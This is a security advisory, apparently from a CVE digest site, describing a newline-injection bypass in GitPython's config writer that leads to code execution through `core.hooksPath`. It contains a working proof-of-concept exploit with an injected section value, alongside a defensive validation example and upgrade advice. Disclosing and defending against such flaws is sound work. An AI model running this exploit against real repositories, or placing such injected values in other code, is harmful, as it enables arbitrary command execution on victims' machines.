GitPython, Configuration Injection, CVE-2026-42215 Bypass (High)


The vulnerability exists because the `set_value()` method of `GitConfigParser` in `git/config.py` (GitPython 3.1.49) only validates newlines in the `value` parameter. The `section` and `option` parameters are passed directly to `configparser` without any validation. An attacker who controls the `section` argument can inject newline characters (`\n`) to manipulate the structure of the `.git/config` file. Specifically, because `_write()` formats a section header as `"[%s]\n" % name`, providing a `section` value like `"user]\n[core"` results in two separate section headers: `[user]` and `[core]`. This allows an attacker to inject arbitrary configuration sections, including a malicious `[core]` section with a `hooksPath` pointing to an attacker-controlled directory. Consequently, when any Git hook (e.g., `pre-commit`) is triggered, the attacker's hook script executes, leading to remote code execution (RCE). This is a bypass of the original patch for CVE-2026-42215, which only addressed newline injection in the `value` parameter.

<h2 style="color: blue;">DailyCVE Form</h2>

Platform: GitPython
Version: 3.1.49
Vulnerability: Newline injection
Severity: High
Date: 2026-05-06

<h2 style="color: blue;">Prediction: Upgrade to 3.1.50</h2>

<h2 style="color: blue;">Analytics (What Undercode Say)</h2>

```bash
# Check current GitPython version
pip show GitPython | grep Version
# Verify if vulnerable to newline injection (section parameter)
python - <<'EOF'
import git
repo = git.Repo.init('/tmp/test_repo')
with repo.config_writer() as cw:
    cw.set_value('test]\n[core', 'hooksPath', '/tmp/evil')
print('Vulnerable if config entry is written')
EOF
# Apply the fix by upgrading to 3.1.50 or later
pip install --upgrade GitPython==3.1.50
```

Exploit

```python
import git, os, subprocess

# Initialize a repository
repo = git.Repo.init("/tmp/bypass_test")
os.makedirs("/tmp/evil_hooks", exist_ok=True)

# Create a malicious pre-commit hook
with open("/tmp/evil_hooks/pre-commit", "w") as f:
    f.write("#!/bin/sh\nid > /tmp/rce_proof.txt\n")
os.chmod("/tmp/evil_hooks/pre-commit", 0o755)

# Inject newline in the section parameter
with repo.config_writer() as cw:
    cw.set_value("user]\n[core", "hooksPath", "/tmp/evil_hooks")

# Verify the injection
r = subprocess.run(["git", "-C", "/tmp/bypass_test", "config", "core.hooksPath"],
                   capture_output=True, text=True)
print(r.stdout.strip())  # Output: /tmp/evil_hooks

# Trigger the hook
subprocess.run(["git", "-C", "/tmp/bypass_test", "commit", "--allow-empty", "-m", "x"])
print(open("/tmp/rce_proof.txt").read())  # RCE confirmed
```

Protection

Upgrade GitPython to version 3.1.50 or later.

If upgrading is not immediately possible, avoid passing untrusted input to the `section` or `option` parameters of `set_value()`.
Consider using a network-level or filesystem monitoring solution to detect unexpected modifications to `.git/config` files.
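To make the header-formatting flaw described above concrete, and to show the input validation and `.git/config` check this section recommends, here is an added example. It is not GitPython's code: it re-implements the `"[%s]\n" % name` formatting in a stand-alone function, validates section and option names with a grammar modelled on git's config rules (the regexes and all function names are my own assumptions), and parses the result the way a monitor reading `.git/config` would.

```python
import configparser
import re

# Stand-alone model of the header formatting the advisory describes
# ("[%s]\n" % name); illustrative only, not GitPython's own _write().
def render_entry(section: str, option: str, value: str) -> str:
    return "[%s]\n%s = %s\n" % (section, option, value)

# Assumed grammar, deliberately strict: a section is alphanumerics, '-' and '.'
# with an optional quoted subsection that may not contain a raw newline;
# an option is a letter followed by alphanumerics or '-'.
_SECTION_RE = re.compile(r'[A-Za-z0-9.-]+( "(?:[^"\\\n]|\\.)*")?')
_OPTION_RE = re.compile(r"[A-Za-z][A-Za-z0-9-]*")

def is_safe_name(name: str, kind: str) -> bool:
    """True only if the name cannot close a header or start a new line."""
    pattern = _SECTION_RE if kind == "section" else _OPTION_RE
    return pattern.fullmatch(name) is not None

def safe_render_entry(section: str, option: str, value: str) -> str:
    """Hardened path: validate all three inputs, not only the value."""
    for name, kind in ((section, "section"), (option, "option")):
        if not is_safe_name(name, kind):
            raise ValueError("unsafe %s name: %r" % (kind, name))
    if "\n" in value or "\r" in value:
        raise ValueError("unsafe value: %r" % value)
    return render_entry(section, option, value)

def parse_sections(config_text: str) -> list:
    """Parse rendered config as a reader would and list the sections it really has."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(config_text)
    return parser.sections()

def hooks_path(config_text: str):
    """What a .git/config monitor would check: is core.hooksPath set, and to what?"""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(config_text)
    return parser.get("core", "hooksPath", fallback=None)

if __name__ == "__main__":
    # Constructed input mirroring the advisory's section value.
    injected = render_entry("user]\n[core", "hooksPath", "/tmp/evil_hooks")
    print(parse_sections(injected), hooks_path(injected))
    try:
        safe_render_entry("user]\n[core", "hooksPath", "/tmp/evil_hooks")
    except ValueError as exc:
        print("blocked:", exc)
```

Running `hooks_path()` over a repository's `.git/config` and alerting when it returns a directory outside the repository is the filesystem-monitoring check this section suggests.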

Impact

Successful exploitation allows an attacker to execute arbitrary commands on the victim’s machine with the privileges of the GitPython process. This can lead to data theft, system compromise, or use as a pivot point for further attacks within an internal network.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
